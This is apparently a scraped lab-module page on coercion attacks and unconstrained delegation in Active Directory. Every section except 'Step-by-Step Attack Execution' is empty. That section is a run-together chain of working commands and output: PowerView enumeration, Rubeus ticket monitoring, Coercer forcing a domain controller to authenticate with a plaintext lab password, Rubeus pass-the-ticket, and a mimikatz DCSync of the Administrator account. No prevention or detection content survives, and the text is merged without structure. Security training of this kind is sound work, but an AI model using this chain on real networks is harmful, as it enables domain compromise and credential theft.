Coercing Attacks & Unconstrained Delegation
Description
Impact
Attack Methodology
Step-by-Step Attack Execution
Get-NetComputer -Unconstrained | select samaccountnamesamaccountname -------------- DC1$ SERVER01$ WS001$ DC2$.\Rubeus.exe monitor /interval:1[*] 18/12/2022 22.37.09 UTC - Found new TGT: User : bob@EAGLE.LOCAL StartTime : 18/12/2022 23.30.09 ...Coercer -u bob -p Slavi123 -d eagle.local -l ws001.eagle.local -t dc1.eagle.local[>] Pipe '\PIPE\lsarpc' is accessible! ... [>] Pipe '\PIPE\spoolss' is accessible! ... [+] All done![*] 18/12/2022 22.55.52 UTC - Found new TGT: User : DC1$@EAGLE.LOCAL StartTime : 18/12/2022 23.30.21 ....\Rubeus.exe ptt /ticket:doIFdDCCBXCgAwIBBa....\mimikatz.exe "lsadump::dcsync /domain:eagle.local /user:Administrator"
Prevention
Detection
Last updated